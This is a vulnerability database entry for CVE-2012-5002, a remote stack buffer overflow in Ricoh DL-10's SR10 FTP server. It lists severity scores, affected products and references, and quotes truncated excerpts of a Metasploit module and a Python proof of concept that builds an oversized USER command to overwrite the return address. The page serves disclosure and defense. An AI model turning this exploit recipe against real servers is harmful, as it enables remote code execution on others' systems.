CVE-2012-5002
Published 2012-09-19
Priority P3 · 52 · medium · CVSS 2.0: 6.8
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 31.16% (98.0th percentile)
Stack-based buffer overflow in SR10 FTP server (SR10.exe) 1.1.0.6 in Ricoh DC Software DL-10 4.5.0.1, when the Log file name option is enabled, allows remote attackers to execute arbitrary code via a long USER FTP command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ricoh | dl-10 | — | — |
| ricoh | sr10_ftp_server | — | — |
No detection rules found.
Exploit-DB
Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)
exploitdb·2012-03-24
CVE-2012-5002 Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
  'Description' => %q{
    This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
    service. By supplying a long string of data to the USER command, it is
    possible to trigger a stack-based buffer overflow, which allows remote code
    execution under the context of the user.
    Please note that in order to trigger the vulnerability, the se
```
Exploit-DB
Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow
exploitdb·2012-03-22
CVE-2015-6750 Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow
---
```python
#!/usr/bin/python
# Exploit Title: Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 Remote Buffer Overflow Vulnerability
# Version: <= 1.1.0.6
# Date: 2012-02-05
# Author: Julien Ahrens
# Homepage: www.inshell.net
# Software Link: http://www.ricohpmmc.com
# Tested on: Windows XP SP3 Professional German
# Notes: Capftpd (former SR-10) is vulnerable too
# Howto: "Log file name" has to be set
import socket,sys
import os
target="192.168.0.1"
port=21
junk1 = "\x41" * 245
boom = "\x42\x42\x42\x42"
junk2 = "\x43" * 50
payload = junk1 + boom + junk2
print "[*] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print
```
Metasploit
Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
metasploit
This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP service. By supplying a long string of data to the USER command, it is possible to trigger a stack-based buffer overflow, which allows remote code execution under the context of the user. Please note that in order to trigger the vulnerability, the server must be configured with a log file name (by default, it's disabled).
References:
http://secunia.com/advisories/47912
http://security.inshell.net/advisory/5
http://www.osvdb.org/79691
http://www.securityfocus.com/bid/52235
https://exchange.xforce.ibmcloud.com/vulnerabilities/73591